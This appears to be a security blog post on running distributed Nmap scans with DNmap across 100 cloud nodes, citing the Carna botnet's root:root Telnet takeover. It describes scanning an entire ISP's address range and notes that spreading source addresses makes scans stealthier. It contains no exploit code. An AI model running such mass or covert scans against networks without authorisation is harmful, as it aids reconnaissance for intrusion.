The legally dubious Carna Botnet and Internet Census 2012 took advantage of systems facing the Internet  running Telnet with the username and password root:root. Hijacking these systems enabled the anonymous security researcher(s) to quickly create a botnet of scanners that scanned the entire Internet (IPv4 range) incredibly quickly.

I was curious if a similar system could be built, that was for starters legal, and although much smaller in scope, would provide flexibility for various types of scans. Nmap is an incredibly powerful tool used by security professionals and system administrators to scan networks for vulnerabilities, system audits and other purposes.

One issue with Nmap is that it is stateful, meaning that it sends a request to a machine and holds the connection open as it waits for the recipient to reply. These requests occur in parallel, however Nmap still keeps and manage records of all the outstanding requests, slowing down the scanning process.

There are new stateless scanning tools such as Zmap from the University of Michigan and Masscan from Robert Graham of Errata Security. These scanners utilize a scheme that encodes information in the packets that identify the original request versus having to keep connections open,  resulting in extremely fast scanning capability.

Screenshot from Errata Security showing massscan running at 24 million packets/second

These new stateless tools are fast, but to scan massive amounts of systems requires a lot of bandwidth and some more complex scans will still require a stateful connection type. In addition Nmap provides a powerful scripting language that allows the brave to expand the capabilities and logic of their scans.

DNmap distributed scan example

To speed things up, I wanted to create a distributed cluster of systems to run my Nmap scans. Lucky for me a powerful utility already exists that allows you to do just that. DNmap developed by Seb Garcia makes distributed scans fairly easy. The only requirements to run the scripts are Python and two Python libraries, python-openssl and python-twisted

For my DNmap server I used a Linode virtual server which worked perfectly and held up just fine against 100 DNmap clients passing data back and forth from it.

For my DNmap client cluster I leveraged CPUsage.  Using their infrastructure I  setup a sandbox, installed the dependencies and easily scripted out the instructions for the nodes. Then within a few minutes I had 100 nodes up and communicating with my DNmap server scanning across an entire ISP.

The complete scan took about an hour, which would have otherwise taken at least a week on a single system. My scan targeted the entire IP range of a popular ISP on port 8080 looking for specific values in http-auth headers.

The DNmap server provides a simple UI showing nodes connecting to the server and their status, number of commands run and other useful stats.

Leveraging a scheme like this also distributes the IP addresses making your scans more efficient and a little less obvious. As the computing power is not particularly a factor, you can also take advantage the more stealthy scanning options Nmap offers.

The DNmap server manages the distribution of the commands and stores its progress, so if a scan is disabled or quits it will restart where it left off. The connection between the client is secured over an encrypted connection so there is some level of security between the client and servers, however it is important to note that the DNmap clients will run any commands given by the DNmap server.

My initial scanning experiments were successful, but the next step is to see if I can ramp the scan up to 1,000 nodes or more, as well as test running stateless scanners in the distributed environment to increase performance for some types of scans.

Ideally it would be optimal to utilize stateless scanners to run initials scans looking for hosts that are up and then utilize Nmap for more in depth scanning of live hosts that meet various conditions or custom NSE scripts.

Related Articles:

• Configuration Compliance and Patch Management Processes
• Control and Capabilities Drive Enterprise Security Confidence
• Security Configuration Management for Dummies
• SecureCheq Uncovers Critical Configuration Vulnerabilities

P.S. Have you met John Powers, supernatural CISO?